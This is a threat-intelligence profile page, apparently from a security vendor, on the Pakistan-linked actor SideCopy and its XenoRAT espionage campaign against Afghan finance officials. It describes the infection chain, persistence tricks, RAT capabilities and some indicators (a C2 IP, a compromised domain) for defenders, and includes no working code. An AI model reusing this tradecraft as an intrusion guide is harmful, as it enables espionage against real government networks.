SideCopy
SideCopy is a Pakistan-linked threat actor, described in the content as likely aligned with or an element of the Pakistani government and operating under or alongside the broader Transparent Tribe / APT36 umbrella. Known aliases in the provided content are SideCopy and TAG_140; the content also describes it as a sub-group of APT36. It is known for targeting government, military, and diplomatic entities across South Asia, with reporting here specifically highlighting campaigns against Afghanistan’s Ministry of Finance, provincial finance and revenue directorates, and Pashto-speaking government officials, as well as prior targeting in India and expansion into railway and oil sectors. The content attributes Operation XENOFISCAL to SideCopy with medium-to-high confidence. In that campaign, SideCopy used spear-phishing emails delivering ZIP archives containing malicious Pashto-language LNK files disguised as PDFs. The LNK files launched mshta.exe to retrieve remote HTA payloads from compromised Afghan infrastructure, including abimj.edu.af, followed by obfuscated JavaScript and .NET/DLL-based loaders that reconstructed payloads in memory. The campaign used fileless execution, registry Run-key persistence masquerading as Microsoft Edge using the value name "Edgre," and in some reporting a scheduled task named "XenoUpdateManager." The final payload was a customized deployment of the open-source Xeno RAT / XenoRAT 1.8.7, used for long-term espionage and remote access. Reported XenoRAT capabilities in the content include remote command execution, data theft and exfiltration, file operations, keylogging, screenshot capture, clipboard monitoring, webcam and microphone access, SOCKS5 tunneling, antivirus discovery, dynamic DLL loading, persistence management, and self-uninstall. The content states that SideCopy used localized Pashto-language lures and a genuine Afghan Ministry of Finance staff directory as a decoy, indicating prior reconnaissance. It also notes use of compromised Afghan government or education-hosted infrastructure to blend malicious traffic with legitimate state activity, while command-and-control infrastructure was hosted separately in Europe, including 185.235.137.106. Additional behaviors directly mentioned in the content include identifying the country location, IP address, and OS version of compromised hosts; sending spear-phishing emails with malicious HTA attachments; attempting to lure victims into clicking malicious embedded archive files; and disguising malware with legitimate DLL names such as Duser.dll. The content also references SideCopy’s use of other payloads in separate activity, including Spark RAT, CurlBack RAT, FalseCub, and XenoRAT, and notes that researchers have tracked the group since at least 2019.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Government & Administration
Where they target
Geographies tied to known operations.
- 🇦🇫 Afghanistan
Where they're from
Attributed origin per open-source reporting.
- PK
Tradecraft
51 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
17 malware families attributed to this actor across reporting.
12 additional families tracked in Mallory.
Associated vulnerabilities
1 CVE this actor has used in observed campaigns. 1 of them exploited in the wild.
Observables
59 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Espionage campaign targeting Afghanistan's government finance apparatus, including the Ministry of Finance and provincial government employees, using spear-phishing and Xeno RAT.
Conducting a targeted cyber espionage campaign against Afghan government networks, specifically the Afghan Ministry of Finance, using spear-phishing with localized Pashto-language lures to deliver a fileless XenoRAT infection chain and establish persistent remote access.
Conducting a spear-phishing campaign against Afghanistan government finance entities and Pashto-speaking officials using Xeno RAT for remote access, persistence, monitoring, and data exfiltration.
Conducting a spear-phishing campaign dubbed Operation XENOFISCAL targeting Afghanistan's Ministry of Finance, provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level government employees; also previously attributed to attacks targeting sectors in India.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.